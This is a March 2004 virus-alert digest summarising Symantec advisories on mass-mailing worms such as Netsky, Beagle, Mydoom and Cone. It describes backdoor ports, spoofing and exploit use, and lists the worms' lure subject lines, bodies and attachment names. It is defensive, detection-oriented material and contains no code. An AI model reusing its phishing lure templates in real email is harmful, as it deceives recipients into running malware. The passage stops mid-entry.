March 2004

Select the links for detailed information and removal tools for the latest viruses

W32.Netsky.R 3/31/2004 2
W32.Beagle.V 3/29/2004 2
W32.Sober.E 3/27/2004 2
W32.Beagle.U 3/26/2004 3
W32.Snapper.A 3/24/2004 2
W32.Blackmal 3/23/2004 2
W32.Gaobot.SA 3/23/2004 2
W32.HLLW.Lovgate.O 3/23/2004 2
W32.Netsky.P 3/21/2004 3
W32.Netsky.Q 3/21/2004 3
W32.Witty.Worm 3/20/2004 2
W32.HLLW.Antinny.G 3/19/2004 2
W32.HLLW.Polybot 3/19/2004 2
W32.Beagle.T 3/18/2004 2
W32.Beagle.S 3/18/2004 2
W32.Beagle.R 3/18/2004 2
W32.Beagle.O 3/18/2004 2
W32.HLLW.Lovgate.N 3/17/2004 2
W32.Netsky.O 3/17/2004 2
W32.Netsky.N 3/15/2004 2
W32.Beagle.N 3/15/2004 2
W32.Beagle.M 3/13/2004 3
W32.Cone.D 3/10/2004 2
W32.Netsky.M 3/10/2004 2
W32.Netsky.L 3/9/2004 2
W32.Cone.C 3/9/2004 2
W32.Netsky.K 3/8/2004 3
W32.Keco 3/8/2004 2
W32.Netsky.J 3/8/2004 2
W32.Sober.D 3/7/2004 2
W32.Netsky.I 3/7/2004 2
W32.Netsky.H 3/5/2004 2
W32.Netsky.G 3/4/2004 2
W32.Mydoom.H 3/3/2004 2
W32.Beagle.K 3/3/2004 2
W32.Netsky.F 3/2/2004 2
W32.Beagle.J 3/2/2004 3
W32.Hiton 3/2/2004 2
W32.Mydoom.G 3/2/2004 2
W32.Beagle.I 3/1/2004 2
W32.Beagle.H 3/1/2004 2
W32.Netsky.E 3/1/2004 2
W32.Netsky.D 3/1/2004 4

W32.Netsky.D@mm
Discovered March 1, 2004
Systems Affected: All Windows32 Systems

W32.Netsky.D@mm is a mass-mailing worm that is a variant of W32.Netsky.C@mm. The worm scans drives C through Z for email addresses and sends itself to those that are found.

The Subject, Body, and Attachment names vary. The attachment will have a .pif file extension.

Read the full Symantec report:
http://sarc.com/avcenter/venc/data/w32.netsky.d@mm.html

W32.Netsky.E@mm
Discovered March 1, 2004
Systems Affected: All Windows32 Systems

W32.Netsky.E is a mass-mailing worm that uses its own SMTP engine to send itself to the email addresses it finds when scanning hard drives and mapped drives. This worm also searches drives C through Y for folders that have names containing "Shar," and then copies itself to those folders.

The Subject, Body, and Attachment vary.

Read the full Symantec report:
http://sarc.com/avcenter/venc/data/w32.netsky.e@mm.html

W32.Beagle.H@mm
Discovered March 1, 2004
Systems Affected: All Windows32 Systems

W32.Beagle.H@mm is a mass-mailing worm that opens a backdoor on TCP port 2745 and uses its own SMTP engine to spread through email. It also sends the attacker the port on which the backdoor listens, as well as the IP address. The email attachment is a randomly named .exe file inside a .zip file. The embedded .exe file is password-protected with a random password.

Read the full Symantec report:
http://sarc.com/avcenter/venc/data/w32.beagle.h@mm.html

W32.Beagle.I@mm
Discovered March 1, 2004
Systems Affected: All Windows32 Systems

W32.Beagle.I@mm is a mass-mailing worm that opens a backdoor on TCP port 2745 and uses its own SMTP engine to spread through email. It also sends the attacker the port on which the backdoor listens, as well as the IP address. The email attachment is a randomly named .exe file inside a .zip file. The embedded .exe file is password-protected with a random password. W32.Beagle.I@mm also attempts to spread across file-sharing networks, such as Kazaa and iMesh, by dropping itself into the directories that contain "shar" in their names.

From: <spoofed>
Subject: <variable>
Attachment: <random characters>.zip, containing an executable <random characters>.exe

W32.Beagle.I@mm is functionally identical to W32.Beagle.H@mm.

Read the full Symantec report:
http://sarc.com/avcenter/venc/data/w32.beagle.i@mm.html

W32.Mydoom.G@mm
Discovered March 2, 2004
Systems Affected: All Windows32 Systems

The W32.Mydoom.G@mm worm:

Is a mass-mailing worm that opens a backdoor on TCP ports 80 and 1080
Can download and execute arbitrary files
Performs a Denial of Service (DoS) against www.symantec.com.

The worm arrives as an attachment with the file extension .bat, .com, .cmd, .exe, .pif, .scr, or .zip. The From: line of the email may be spoofed.

Read the full Symantec report:
http://sarc.com/avcenter/venc/data/w32.mydoom.g@mm.html

W32.Hiton@mm
Discovered March 2, 2004
Systems Affected: All Windows32 Systems

Symantec Security Response has received reports of a new mass-mailing worm. At this time we have received no customer submissions of this threat. A sample has been obtained and we will provide information as our analysis progresses.

Read the full Symantec report:
http://sarc.com/avcenter/venc/data/w32.hiton@mm.html

W32.Beagle.J@mm
Discovered March 2, 2004
Systems Affected: All Windows32 Systems

W32.Beagle.J@mm is a mass-mailing worm that opens a backdoor on TCP port 2745 and uses its own SMTP engine to spread through email. It also sends the attacker the port on which the backdoor listens, as well as the IP address.

The email attachment is a randomly named .exe file inside a .zip file, or an executable .pif file. The zip file will be password-protected. The from address is spoofed to appear as though its coming from the one of the following addresses at the recipients domain: management, administration, staff, noreply, or support.

W32.Beagle.J@mm also attempts to spread across file-sharing networks, such as Kazaa and iMesh, by dropping itself into the directories that contain "shar" in their names.

Read the full Symantec report:
http://sarc.com/avcenter/venc/data/w32.beagle.j@mm.html

W32.Netsky.F@mm
Discovered March 3, 2004
Systems Affected: All Windows32 Systems

W32.Netsky.F@mm is a mass-mailing worm that uses its own SMTP engine to send itself to the email addresses it finds when scanning hard drives and mapped drives.

The Subject, Body, and Attachment vary.

Note: Symantec Security Response is currently investigating this worm. More information will be published as soon as it is available.

Read the full Symantec report:
http://sarc.com/avcenter/venc/data/w32.netsky.f@mm.html

W32.Beagle.K@mm
Discovered March 3, 2004
Systems Affected: All Windows32 Systems

The W32.Beagle.K@mm worm:

Is a variant of W32.Beagle.J@mm that opens a backdoor on TCP port 2745 and uses its own SMTP engine to spread through email.
Sends the attacker the port on which the backdoor listens, as well as the IP address.
Attempts to spread through file-sharing networks, such as Kazaa and iMesh, by dropping itself into the folders that contain "shar" in their names.

The email has the following characteristics:
From: Spoofed to appear as though its coming from the one of the following addresses at the recipient's domain:
management
administration
staff
noreply
support
Attachment: A randomly named .exe file that is inside a .zip file or a .pif file. The .zip file will be password-protected.

Read the full Symantec report:
http://sarc.com/avcenter/venc/data/w32.beagle.k@mm.html

W32.Mydoom.H@mm
Discovered March 3, 2004
Systems Affected: All Windows32 Systems

The W32.Mydoom.H@mm worm:

Is a mass-mailing worm that opens a backdoor on TCP ports 80 and 1080
Can download and execute arbitrary files
Performs a Denial of Service (DoS) against www.symantec.com.
Sends to the email addresses found in the files with specified extensions.
May delete the files with certain extensions. For example, .jpg, .avi, and .bmp.
Name of attachment varies with an extension of .pif, .scr, .exe, .cmd, .com, .bat, or .zip; may have double extensions.

The worm arrives as an attachment with the file extension .bat, .com, .cmd, .exe, .pif, .scr, or .zip. The From: line of the email may be spoofed.

Read the full Symantec report:
http://sarc.com/avcenter/venc/data/w32.mydoom.h@mm.html

W32.Netsky.G@mm
Discovered March 4, 2004
Systems Affected: All Windows32 Systems

W32.Netsky.G@mm is a mass-mailing worm that uses its own SMTP engine to send itself to the email addresses it finds when scanning hard drives and mapped drives.

The Subject, Body, and Attachment vary.

Read the full Symantec report:
http://sarc.com/avcenter/venc/data/w32.netsky.g@mm.html

W32.Netsky.H@mm
Discovered March 5, 2004
Systems Affected: All Windows32 Systems

W32.Netsky.H@mm is a mass-mailing worm that uses its own SMTP engine to send itself to the email addresses it finds when scanning hard drives and mapped drives.

The Subject, Body, and Attachment vary.

If an infected computer's system clock is between 11:00 A.M. and 12:00 P.M. on March 8th, 2004, the PC speaker will beep in a continuous loop. Each beep will be for a random period of time, at a random frequency.

Read the full Symantec report:
http://sarc.com/avcenter/venc/data/w32.netsky.h@mm.html

W32.Netsky.I@mm
Discovered March 7, 2004
Systems Affected: All Windows32 Systems

W32.Netsky.I@mm is a mass-mailing worm that uses its own SMTP engine to send itself to the email addresses it finds when scanning hard drives and mapped drives.

The email has the following characteristics:
Subject: (One of the following)

Mail account expired
Mail account closed
Mail account deactivated

Body: (One of the following)

Your mail account expired. Please follow the link to reactivate.
Your mail account has been closed. Click on the link for further details.
Your mail account has been deactivated. To reactivate, follow the link.

Read the full Symantec report:
http://sarc.com/avcenter/venc/data/w32.netsky.i@mm.html

W32.Sober.D@mm
Discovered March 7, 2004
Systems Affected: All Windows32 Systems

W32.Sober.D@mm is a mass-mailing worm that replicates in the form of an email using its own SMTP client engine. The subject and the body of the email varies and is written in either English or German. W32.Sober.D@mm is a Visual Basic application, packed with UPX.

Sober.D disguises itself as a Microsoft Update in both English and German language versions. Copies of the Sober.D worm arrive in e-mail messages with the subject "Microsoft Alert: Please Read!" or "Microsoft Alarm: Bitte Lesen!" said the antivirus company. The worm file is embedded in file attachments with the .exe or .zip file extension and names such as "Patch," "MS-Security" and "UpDate."

The worm displays the following messages:

• This patch has been successfully installed.
• This patch does not need to be installed on this system.
• Microsoft Windows
• STOP: 0x80070725 {FatalSystemError}
• System File [filename].exe
• Connection lost or blocked by Firewall

Read the full Symantec report:
http://sarc.com/avcenter/venc/data/w32.sober.d@mm.html

W32.Netsky.J@mm
Discovered March 8, 2004
Systems Affected: All Windows32 Systems

W32.Netsky.J@mm is a mass-mailing worm that uses its own SMTP engine to send itself to the email addresses it finds when scanning hard drives and mapped drives.

The sent email will have the following characteristics:

Subject: One of the following:
Your product
Your letter
Re: corrected homework
Re: I've found your document
Re: Your bill
Re: hello again
Re: hi again
Re: part 3
Re: important document part 2
Re: important
Re: Your data
Re: Your application
Re: your music
Re: excel document
Re: Re: Re: word document
Re: Your details
Re: My details
Re: Your requested file
Re: Read it immediately
Re: Approved
Re: Your software
Re: my memberlist
Re: Your document
Re: Your file
Re: Your important document
www.%s.tripod.com
Hi Mr. %s
Moi %s
He %s
Yours faithfully, %s
Message to %s
Hi Mrs. %s
Is %s.doc yours?
Is %s.xls yours?
Whats up %s
www.paypal.com/%s
Na %s
Best %s
Love %s
Good morning %s
Have a good day %s
Dear %s
To %s , it's me
Welcome %s
Moin %s
Hello %s
Your account %s is expired!
Hey %s
Hi %s
www.%s.freepage.com, your website
Hi %s, your product
Hello %s, your letter
Re: Hi %s, your archive
Re: %s, your text
Re: Hello %s, your bill
Re: Hi %s, your details
Re: Hello %s, my details
Re: Hi %s, your word file
Re: Hello %s, your excel file
Re: Hi %s, details
Re: Hello %s, Approved
Re: Hello %s, your software
Re: Hi %s, your music
Re: Dear %s, Here
Re: Re: Re: Hello %s, your document
Re: Hi %s
Re: Dear %s, Hi
Re: Re: Hi %s, your message
Re: Here %s, your picture
Re: Hi %s, here is the document
Re: Hello %s, your document
Re: %s, thanks!
Re: Re: %s, thanks!
Re: Re: Hi %s, document
Re: Hello %s, document

Where %s is the portion of the "To" address before the "@".

Body: One of the following:
Your file is attached. Use this password for the file: %i.
Please read the attached file. Password for the file is %i.
Please have a look at the attached file. Password for decrypting is %i.
See the attached file for details. Password is %i.
Here is the file. My password is %i.
Your document is attached. Your password is %i.

Where %i is a random number.

Attachment:One of the following:
Will be a passworded zip file containing one of the following files
website_%s.pif
your_product_%s.pif
letter_%s.pif
archive%s.pif
your_text%s.pif
bill_%s.pif
your_details%s.pif
%s_details.pif
%s_document_word.pif
%s_document_excel.pif
%s_my_details.pif
%s_all_document.pif
%s_application.pif
mp3music_%s.pif
yours%s.pif
document_%s4351.pif
%s_picture.pif
%s_file.pif
%s_message_details.pif
yourpicture%s.pif
%s_document_full.pif
%s_your_message_part2.pif
%sinformation.pif
%sdocument.pif
%s_your_document.pif

Where %s is the portion of the "To" address before the "@".

Read the full Symantec report:
http://sarc.com/avcenter/venc/data/w32.netsky.j@mm.html

W32.Keco@mm
Discovered March 8, 2004
Systems Affected: All Windows32 Systems

W32.Keco@mm is a mass mailing worm that spreads via its own SMTP engine. It mails itself to all email addresses it finds on an infected computer.

If the mail cannot be sent, the worm continues to open ports sequentially. This could freeze a system.

Displays a message box that says, "Now this will try to send a mail to Askel ;D"

Creates a file C:\coke.txt, which contains rude messages to other worm writers.

Creates a mail message which may contain one of the following subjects:
Your details
Your File
Your document
eCard sent to you
My File
Your picture
My picture
You got a pic ?
You got image ?
You got picture?
Pic?
Image?
File?
File!
Document!
The document
Yours
New document
New File
Your ZIP
My private pics
My private files
My private images
My private documents
My private textes
the text
the poem
a Poem
a Text
a Picture
a Image
My Text
My Poem
Did you like my poem?
Did you like my text?
2 Poem
some text
whos picture ?
a Joke
Image of you
Links
profile
your profile
Its me :)
Im back :D
hello dude
whats up?
sup ?
i got a problem
warning, its me
warning, im hot
s--t man :P
haha there you are
ive searched for you :D
wow, im so cool
what you want ?
hey, stop buggin me
is it just me?
great
doesnt matter to me
which u want?
gr8 :)
hahahahahahaha :D
are you jesus? ;D
she said what i was supposed to think :P
Cute, Boring, Love.
cute boring love :P
its whats its all about
i like apple juice
coke just rules done you think ?
i want to trademark
i want to own you
i want you
i want to have you
dont you longing for purity ?
dont you ever gets so sick of territories ?
i am naked
man im nude
dude, im nude
what are you so scared of ?
sick of spam? so am i :/
s--t s--t s--t
do you trust me?
do i trust you?
do you know me?
do i know you?
i eat glass :D
i can walk on the water
this is so sick man :D
check it out, its sick :D
WOW, powerlevel up :D
wow hahaha
wow, if this aint pron, then i dont know what it is
i made a mistake :(
is this a mistake ?
do you have a mistake ?
i made a mistake
are you intrested in making movies?
making movies ?
getting money?
i love money
do you love money?
i got a picture of you and me
i got a picture of you
i got a picture of me
you got a picture of us
you got a picture of me
you got a picture ?
i hate to be singel
i hate to not be lesbian
i hate to be gay
i hate to be a homosexual
i am a lesbian
i hate fags
are you a f-g?
is this right mail?
is this james?
is this kirk?
is this kurt?
is this rutger?
is this stefan?
is this stephen?
is this mary?
is this julie?
is this ?
is ?
want to listen on some music?
oh yea, thats how i like it
how i like it
oh yea
im afraid
im not afraid
im afraid of dieing
im afraid of begin ignore
im afraid of feeling
im not afraid of trying
do you got msn?
do you got icq?
do you got aim?
do you got mail? :D
where is the sky?
i am hiding
noone knows, just u and i
just u and i
U and i
U + I
I + U
i see everything :D
Best i am
I am Best
Am best I
Am i Best
Best Am I
i Best Am
blah blah blah
words, i hate words
w0rd

The subject may be preceded with Re: , re: , Fwd: or FWD:

It attempts to connect to predefined IRC servers via IRC port 6667. User names are random, but always end with domain "@foo.bar."

Read the full Symantec report:
http://sarc.com/avcenter/venc/data/w32.keco@mm.html

W32.Netsky.K@mm
Discovered March 8, 2004
Systems Affected: All Windows32 Systems

W32.Netsky.K@mm is a mass-mailing worm that uses its own SMTP engine to send itself to the email addresses it finds when scanning hard drives and mapped drives.

The "sender" of the email is spoofed, and its subject, message body, and attachment vary. The attachment has .pif as extension.

From: Spoofed

Subject: The subject line is one of the following:

Re: Your website
Re: Your product
Re: Your letter
Re: Your archive
Re: Your text
Re: Your bill
Re: Your details
Re: My details
Re: Word file
Re: Excel file
Re: Details
Re: Approved
Re: Your software
Re: Your music
Re: Here
Re: Re: Re: Your document
Re: Hello
Re: Hi
Re: Re: Message
Re: Your picture
Re: Here is the document
Re: Your document
Re: Thanks!
Re: Re: Thanks!
Re: Re: Document
Re: Document

Message: The message is one of the following:

Your file is attached.
Please read the attached file.
Please have a look at the attached file.
See the attached file for details.
Here is the file.
Your document is attached.

Attachment: The attachment is one of the following:

your_website.pif
your_product.pif
your_letter.pif
your_archive.pif
your_text.pif
your_bill.pif
your_details.pif
document_word.pif
document_excel.pif
my_details.pif
all_document.pif
application.pif
mp3music.pif
yours.pif
document_4351.pif
your_file.pif
message_details.pif
your_picture.pif
document_full.pif
message_part2.pif
document.pif
your_document.pif

If the system time is between 6:00 A.M. and 9:00 A.M. on Tuesday, March 2, 2004, the PC speaker will beep in a continuous loop. Each beep will be for a random period of time, at a random frequency.

Read the full Symantec report:
http://sarc.com/avcenter/venc/data/w32.netsky.k@mm.html

W32.Cone.C@mm
Discovered March 9, 2004
Systems Affected: All Windows32 Systems

W32.Cone.C@mm is a minor variant of W32.Cone@mm. The worm sends itself to the email addresses it gathers from the files on an infected computer. The worm also modifies the local hosts file to prevent access to various websites.

The attachment will have an .exe, .scr, or .zip file extension.

From: <Spoofed>

Subject: (One of the following)
How cute is your credit card number!! :))
E-mail account disabling warning for <name>
RE: <name>
i have your password :)
RE: Thank You!
RE: details (<name>)
Password Reset For <name>
Undelivered Mail Returned to Sender (<name>)
about you
Your account (<name>) will be closed
Your IP has been logged
Mail Delivery System (<name>)
Mail Transaction Failed (<name>)
IMPORTANT <name>!
Confidential user information!

Attachment: (One of the following)
unknown.exe
unknown.scr
document.exe
document.scr
nothing.exe
nothing.scr
password.exe
password.scr
information.exe
information.scr
hello.exe
hello.scr
text.txt.exe
untitled.exe
secret!!.exe
unknown1.exe
CoolText.exe
EULA-USA.exe
readmeUS.exe
<random>.zip

Read the full Symantec report:
http://sarc.com/avcenter/venc/data/w32.cone.c@mm.html

W32.Netsky.L@mm
Discovered March 9, 2004
Systems Affected: All Windows32 Systems

W32.Netsky.L@mm is a mass-mailing worm that uses its own SMTP engine to send itself to the email addresses it finds when scanning hard drives and mapped drives.

The "sender" of the email is spoofed, and its subject, message body, and attachment vary. The attachment has a .pif extension.

From: <Spoofed>

Subject: The subject line is one of the following:

Re: Important
Re: Your document
Re: Your details
Re: Approved

Message: The message is one of the following:

Your file is attached.
Please read the document.
Your document is attached.
Please read the attached file.
Please see the attached file for details.

Attachment: The attachment is one of the following:

your_file_%s.pif
details_%s.pif
document_%s.pif
%s.pif

where %s is the portion of the "To" address before the "@".

Read the full Symantec report:
http://sarc.com/avcenter/venc/data/w32.netsky.l@mm.html

W32.Netsky.M@mm
Discovered March 10, 2004
Systems Affected: All Windows32 Systems

W32.Netsky.M@mm is a mass-mailing worm that uses its own SMTP engine to send itself to the email addresses it finds when scanning hard drives and mapped drives.

The "sender" of the email is spoofed, and its subject, message body, and attachment vary. The attachment has a .pif extension.

From: <Spoofed>

Subject: The subject line is one of the following:

Re: <%s> Requested file
Re: <%s> My file
Re: <%s> My document
Re: <%s> My information
Re: <%s> My details
Re: <%s> Information
Re: <%s> Improved
Re: <%s> Requested document
Re: <%s> Document
Re: <%s> Details
Re: <%s> Your document
Re: <%s> Your details
Re: <%s> Approved

Message: The message is one of the following:

Details for %s.
Document %s.
I have received your document. The improved document %s is attached.
I have attached your document %s.
Your document %s is attached to this mail.
Authentification for %s required.
Requested file %s.
See the file %s.
Please read the important message msg_%s.
Please confirm the document %s.
%s is attached.
Your file %s is attached.
Please read the document %s.
Your document %s is attached.
Please read the attached file %s.
Please see the attached file %s for details..

Attachment: The attachment is one of the following:

improved_%s.pif
message_%s.pif
detailed_%s.pif
your_document_%s.pif
word_doc_%s.pif
doc_%s.pif
articel_%s.pif
picture_%s.pif
file_%s.pif
your_file_%s.pif
details_%s.pif
document_%s.pif
%s.pif

where %s is the portion of the "To" address before the "@".

Read the full Symantec report:
http://sarc.com/avcenter/venc/data/w32.netsky.m@mm.html

W32.Cone.D@mm
Discovered March 10, 2004
Systems Affected: All Windows32 Systems

W32.Cone.D@mm is a mass-mailing worm that uses its own SMTP engine to send itself to the email addresses it gathers from the files on an infected computer.

The attachment will have an .exe or .zip file extension.

RE: the attachment is in the SKY [weN]
How cute is your credit card number!! :))
E-mail account disabling warning for %s
the attachment is in the SKY [weN]
Hi
i have your password :)
RE: Thank You!
RE: details (%s)
Password Reset For %s
Undelivered Mail Returned to Sender (%s)
about you
Your account (%s) will be closed
Your IP has been logged
Mail Delivery System (%s)
Mail Transaction Failed (%s)
IMPORTANT %s!
Confidential user information!

where %s is the recipient name.

Message: The message is one of the following:

Hi lucky,
The attachment is a virus do not open it.
I write it to say : we don't want islamic republic in IRAN!
I'm realy sorry, I'm damaging some computers that I don't want to damage!!!!

Dear user of <recipient name>,

We warn you about some attacks on your e-mail account. Your computer may contain viruses, in order to keep your computer and e-mail account safe,
please, follow the instructions.

The Management,
The <recipient's domain> team http: //www.<recipient's domain>

take it easy
I have your password :)
The zip archive attached.<br>extract it and then read the text file!
i zip your password (and some other info) :))
I have it too!
you can change it, but...!

Warning!!!
This message contains (attached) users personal info and you may not use it for personal use,
remember that you accept the agreement,
and you are responsible for any kind of misuse of the users personal info.
i zip it for you.
i can't find anything usefull in your attachment.
See the attached file for details
your credit card information attached :))
do you can imagine?
a <random letters> in a zip file!
The message contains Unicode (Chinese) characters and has been sent as an attachment (in binary).
Details Attached.
Attachment: The attachment file name is <eight random letters or digits>.exe. The worm may send a zip archive of itself.

Read the full Symantec report:
http://sarc.com/avcenter/venc/data/w32.cone.d@mm.html

W32.Beagle.M@mm
Discovered March 13, 2004
Systems Affected: All Windows32 Systems

The W32.Beagle.M@mm is a polymorphic mass-mailing worm that uses its own SMTP engine to spread through email. Like previous Beagle variants, this worm opens a backdoor (it listens on TCP port 2556), and attempts to spread through file-sharing networks by copying itself to folders that contain "shar" in their names. W32.Beagle.M@mm also infects files with the EXE extension.

The email has the following characteristics:

From: Spoofed to appear as though it is coming from the one of the following addresses at the recipient's domain:

management
administration
staff
noreply
support

Subject: One of the following:
Account notify
E-mail account disabling warning.
E-mail account security warning.
E-mail technical support message.
E-mail technical support warning.
E-mail warning
Email account utilization warning.
Email report
Encrypted document
Fax Message Received
Forum notify
Hidden message
Important notify
Important notify about your e-mail account.
Incoming message
Notify about using the e-mail account.
Notify about your e-mail account utilization.
Notify from e-mail technical support.
Protected message
RE: Protected message
RE: Text message
Re: Document
Re: Hello
Re: Hi
Re: Incoming Fax
Re: Incoming Message
Re: Msg reply
Re: Thank you!
Re: Thanks :)
Re: Yahoo!
Request response
Site changes

Attachment: A randomly named .exe file, stored inside a .zip file or a .rar file, or a .pif file. The .zip and .rar files file may be password-protected. The filename, minus the extension, is one of the following:
Attach
Details
Document
Encrypted
Gift
Info
Information
Message
MoreInfo
Readme
Text
TextDocument
details
first_part
pub_document
text_document

Read the full Symantec report:
http://sarc.com/avcenter/venc/data/w32.beagle.m@mm.html

W32.Beagle.N@mm
Discovered March 15, 2004
Systems Affected: All Windows32 Systems

W32.Beagle.N@mm is a polymorphic mass-mailing worm that uses its own SMTP engine to spread through email. Like previous Beagle variants, this worm opens a backdoor (it listens on TCP port 2556), and attempts to spread through file-sharing networks by copying itself to folders that contain "shar" in their names. W32.Beagle.N@mm also infects files with the EXE extension.The email has the following characteristics:

From: Spoofed to appear as though it is coming from the one of the following addresses at the recipient's domain:

management
administration
staff
antivirus
antispam
noreply
support

Subject: One of the following:
Account notify
E-mail account disabling warning.
E-mail account security warning.
E-mail technical support message.
E-mail technical support warning.
E-mail warning
Email account utilization warning.
Email report
Encrypted document
Fax Message Received
Forum notify
Hidden message
Important notify
Important notify about your e-mail account.
Incoming message
Notify about using the e-mail account.
Notify about your e-mail account utilization.
Notify from e-mail technical support.
Protected message
RE: Protected message
RE: Text message
Re: Document
Re: Hello
Re: Hi
Re: Incoming Fax
Re: Incoming Message
Re: Msg reply
Re: Thank you!
Re: Thanks :)
Re: Yahoo!
Request response
Site changes

Attachment: A randomly named .exe file, stored inside a .zip file or a .rar file, or a .pif file. The .zip and .rar files file may be password-protected. The filename, minus the extension, is one of the following:
Attach
Details
Document
Encrypted
Gift
Info
Information
Message
MoreInfo
Readme
Text
TextDocument
details
first_part
pub_document
text_document

Read the full Symantec report:
http://www.sarc.com/avcenter/venc/data/w32.beagle.n@mm.html

W32.Netsky.N@mm
Discovered March 16, 2004
Systems Affected: All Windows32 Systems

W32.Netsky.N@mm is a mass-mailing worm that uses its own SMTP engine to send itself to the email addresses it finds when scanning the hard drives and mapped drives.

The "sender" of the email is spoofed, and its subject, message body, and attachment vary. The attachment has a .pif extension.

From: <Spoofed>

Subject: The subject line is composed of multiple parts.

The first part may be one of the following:

Re:
Re: Re:

The second part may be one of the following:

my
your
[blank]

And the third part may be one of the following:

application
approved
approved
bill
corrected
data
details
document
document_all
excel document
file
hello
here
hi
important
important
improved
information
letter
message
patched
product
read it immediately
screensaver
text
thanks!
website
word document
Message: The message is one of the following:

Authentication required.
I have attached your document.
I have received your document. The corrected document is attached.
Please confirm the document.
Please read the attached file.
Please read the document.
Please read the important document.
Please see the attached file for details.
Requested file.
See the file.
Your details.
Your document is attached to this mail.
Your document is attached.
Your document.
Your file is attached.

Followed by:
--------------------------------------------
(attachment_name) : No virus found
Powered by the new Norton OnlineScan
Get protected: www.symantec.com
Attachment: The attachment is one of the following with a .zip, .pif, .exe, or .scr extension:

application_%s
approved_%s
bill_%s
data_%s
details_%s
document_%s
document_all_%s
excel document_%s
file_%s
important_%s
information_%s
letter_%s
message_%s
product_%s
screensaver_%s
text_%s
website_%s
word document_%s

where %s is the portion of the "To" address before the "@".

Read the full Symantec report:
http://sarc.com/avcenter/venc/data/w32.netsky.n@mm.html

W32.Netsky.O@mm
Discovered March 17, 2004
Systems Affected: All Windows32 Systems

W32.Netsky.O@mm is a mass-mailing worm that uses its own SMTP engine to send itself to the email addresses it finds when scanning the hard drives and mapped drives. The "sender" of the email is spoofed, and its subject line and message body of the email vary. The attachment is one of the following:

readme.pif
document.pif
data.pif
details.pif
msg.pif
message.pif

Read the full Symantec report:
http://sarc.com/avcenter/venc/data/w32.netsky.o@mm.html

W32.Beagle.O@mm
Discovered March 18, 2004
Systems Affected: All Windows32 Systems

W32.Beagle.O@mm is a polymorphic mass-mailing worm that uses its own SMTP engine to spread through email. The worm opens a backdoor on TCP port 2556 and attempts to spread through file-sharing networks by copying itself to the folders that contain "shar" in their names. W32.Beagle.O@mm also infects files with the .exe file extension. The email has the following characteristics:

From: Spoofed to appear as though it is coming from a predetermined addresses at the recipient's domain.
Subject: Varies
Attachment: A randomly named .exe file, stored inside a .zip file, a .rar file, or a .pif file. The .zip and .rar files file may be password-protected.

W32.Beagle.O@mm exploits the vulnerability described in Microsoft Security Bulletin MS03-040 to propagate. Symantec Security Response is currently investigating this aspect of the threat and will post more information as it becomes available.
Symantec Security Response has developed a removal tool to clean the infections of W32.Beagle.O@mm.

Read the full Symantec report:
http://sarc.com/avcenter/venc/data/w32.beagle.o@mm.html

W32.Beagle.R@mm
Discovered March 18, 2004
Systems Affected: All Windows32 Systems

W32.Beagle.R@mm is a variant of W32.Beagle.O@mm. This worm attempts to send an HTML email to the addresses found in the files on an infected computer. The email does not contain an attachment of the worm. Instead, the HTML email uses the Microsoft Internet Explorer Object Tag Vulnerability that allows for the automatic download and execution of a file hosted on a remote Web site. This file is a copy of the worm, but may change in the future.

The worm also opens a backdoor, starts a Web server on port 81 to serve the worm, and attempts to spread through file-sharing networks by copying itself to the folders with "shar" in their names. The worm is also a file infector that appends itself to the .exe files found in the c:\emails folder on the computer.

--------------------------------------------------------------------------------
Note: If the current year is 2006 or later, the worm will not infect the computer.

Obtain the patch as described in Microsoft Security Bulletin MS03-040

Uses its own SMTP engine to send itself to the email addresses it collected. The worm contains its own MIME-encoding routine and will compose the email in memory.

The email has the following characteristics:

From: (One of the following)
management@<recipient domain>
administration@<recipient domain>
staff@<recipient domain>
antivirus@<recipient domain>
antispam@<recipient domain>
noreply@<recipient domain>
support@<recipient domain>

Subject: (One of the following)
Account notify
E-mail account disabling warning.
E-mail account security warning.
E-mail technical support message.
E-mail technical support warning.
E-mail warning
Email account utilization warning.
Email report
Encrypted document
Fax Message Received
Forum notify
Hidden message
Important notify
Important notify about your e-mail account.
Incoming message
Notify about using the e-mail account.
Notify about your e-mail account utilization.
Notify from e-mail technical support.
Protected message
RE: Protected message
RE: Text message
Re: Document
Re: Hello
Re: Hi
Re: Incoming Fax
Re: Incoming Message
Re: Msg reply
Re: Thank you!
Re: Thanks :)
Re: Yahoo!
Request response
Site changes
Warning about your e-mail account

Body:
The body of the email will appear as a blank message, but will contain HTML code that will not be visible, and will automatically download and execute the worm from a remote Web site using the Internet Explorer Object Tag Vulnerability described in Microsoft Security Bulletin MS03-032.

Read the full Symantec report:
http://sarc.com/avcenter/venc/data/w32.beagle.r@mm.html

W32.Beagle.S@mm
Discovered March 18, 2004
Systems Affected: All Windows32 Systems

W32.Beagle.S@mm is a variant of W32.Beagle.O@mm. This worm attempts to send an HTML email to addresses found in files on an infected computer. The email does not contain an attachment of the worm. Instead, the HTML email uses the Microsoft Internet Explorer Object Tag Vulnerability that allows for the automatic download and execution of a file hosted on a remote Web site. This file is a copy of the worm, but may change in the future.

The worm also opens a backdoor, starts a Web server on TCP port 81 to serve the worm, and attempts to spread through file-sharing networks by copying itself to the folders with "shar" in their names. The worm is also a file infector that appends itself to the .exe files found in the c:\emails folder on the computer.

Obtain the patch as described in Microsoft Security Bulletin MS03-040

Read the full Symantec report:
http://sarc.com/avcenter/venc/data/w32.beagle.s@mm.html

W32.Beagle.T@mm
Discovered March 18, 2004
Systems Affected: All Windows32 Systems

W32.Beagle.T@mm is a variant of W32.Beagle.R@mm. This worm attempts to send an HTML email to the addresses found in the files on an infected computer. The email does not contain an attachment of the worm. Instead, the HTML email uses the Microsoft Internet Explorer Object Tag Vulnerability that allows for the automatic download and execution of a file hosted on a remote Web site. This file is a copy of the worm, but may change in the future.

The worm also opens a backdoor, starts a Web server on port 81 to serve the worm, and attempts to spread through file-sharing networks by copying itself to folders with "shar" in their names. The worm is also a file infector that appends itself to the .exe files found on the computer.

Obtain the patch as described in Microsoft Security Bulletin MS03-040

Read the full Symantec report:
http://sarc.com/avcenter/venc/data/w32.beagle.t@mm.html

W32.HLLW.Lovgate.N@mm
Discovered March 17, 2004
Systems Affected: All Windows32 Systems

W32.HLLW.Lovgate.N@mm is a variant of W32.HLLW.Lovgate@mm. This variant is also a mass-mailing worm that attempts to email itself to all the email addresses it finds in the system. The "sender" of the email is spoofed, and its subject line and message body of the email vary.

This worm also attempts to copy itself to all the computers on a local network and the KaZaA shared folder.

If the original email is:

Subject: <subject>
From: <someone>@<somewhere.com>
Message: <original message body>

the worm will attempt to send the following email:

Subject: Re: <subject>
To: <someone>@<somewhere.com>
Message:
'<someone>' wrote:
====
> <original message body>
>
====

<sender's domain> account auto-reply:

